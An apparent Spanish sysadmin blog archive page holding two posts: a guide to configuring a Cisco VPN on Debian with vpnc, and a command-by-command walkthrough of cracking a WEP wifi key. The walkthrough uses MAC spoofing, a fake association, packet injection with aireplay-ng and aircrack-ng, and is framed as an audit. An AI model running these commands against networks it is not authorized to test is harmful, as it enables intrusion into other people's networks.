Archivo

Archive for 17 diciembre 2009

Vpn-Cisco Linux

diciembre 17, 2009 Deja un comentario

Para realizar una conexión vpn de cisco desde una máquina linux debian, podemos usar el programa compatible vpnc:

  • aptitude install vpnc

Creamos un fichero con los datos de la conexión que nos haya dado nuestro proveedor:

  • vim proveedor

IPSec gateway  “nombre del host”
IPSec ID “id de la conexión”
IPSec secret “contraseña de la conexión”
IKE Authmode psk
Interface mode tun
NAT Traversal Mode cisco-udp
Local Port 500
Xauth username “usuario de la conexión”
Xauth password “password de la conexión”

Movemos el fichero a /etc/vpnc/

  • mv proveedor /etc/vpnc/

Iniciamos la conexión:

  • vpnc-connect proveedor

Si realiza bien la conexión nos debería aparecer una nueva interfaz de red llamada “tun0” con una ip asignada:

tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr: 111.111.111.111  P-t-P:111.111.111.111  Mask:255.255.255.0
UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1412  Metric:1
RX packets:1893 errors:0 dropped:0 overruns:0 frame:0
TX packets:2024 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:1854138 (1.7 MiB)  TX bytes:320696 (313.1 KiB)

Anuncios
Categorías:SysAdmin Etiquetas: , ,

Auditoria ipw2200+injection Sin Clientes Método 1 WifiSlax-3.1

diciembre 17, 2009 Deja un comentario

RECOPILANDO INFORMACIÓN:

Mi interfaz wifi es eth1.

Vamos a wifislax-> asistencia chipset -> asistencia intel pro wireless -> recargar modulo ipw2200

Con esto nos sale una nueva interfaz rtap0.

Configuramos las interfaces eth1 y rtap0:

ifconfig eth1 up

ifconfig rtap0 up

ifconfig eth1 hw ether 00:11:22:33:44:55

Sabiendo esto ejecutamos:

airodump-ng -w captura rtap0

Anotamos el essid de la red a auditar, su bssid, el ch y relanzamos el comando para que sólo capture en esa red.

En mi caso la información que necesito es:

-interfaz wifi: eth1

-nueva interfaz wifi para inyectar: rtap0

– essid: WLAN_80

-bssid: 00:55:44:33:22:11

-mimac: 00:11:22:33:44:55

Borramos los ficheros captura* creados y relanzamos airodump-ng:

airodump-ng -c 6 -w captura –bssid 00:55:44:33:22:11 rtap0

Hacemos una asociación falsa a la red:

iwconfig eth1 essid WLAN_80 channel 6 key 6666666666666

Y ahora inyectamos:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF -b 00:55:44:33:22:11 -h 00:11:22:33:44:55 eth1 -i rtap0

-b: bssid de la red

-h: mi mac

Esperamos a que capture algún paquete, puede tardar algunos minutos. En cuanto llegue alguno teclamos “y”  “enter”.

Empezará a inyectar, y en la shell anterior dónde tenemos corriendo el airodump-ng el valor “Data” empezará a incrementarse.

Esperamos a que alcance un valor entre 20000-30000 y ejecutamos el aircrack-ng:

aircrack-ng -z captura-2.cap

-z: le damos el fichero de captura que llamamos captura con extensión cap más grande, en mi caso sería captura-2.cap.

En unos minutos nos la clave en formato hexadecimal y ascii.

Categorías:SysAdmin Etiquetas: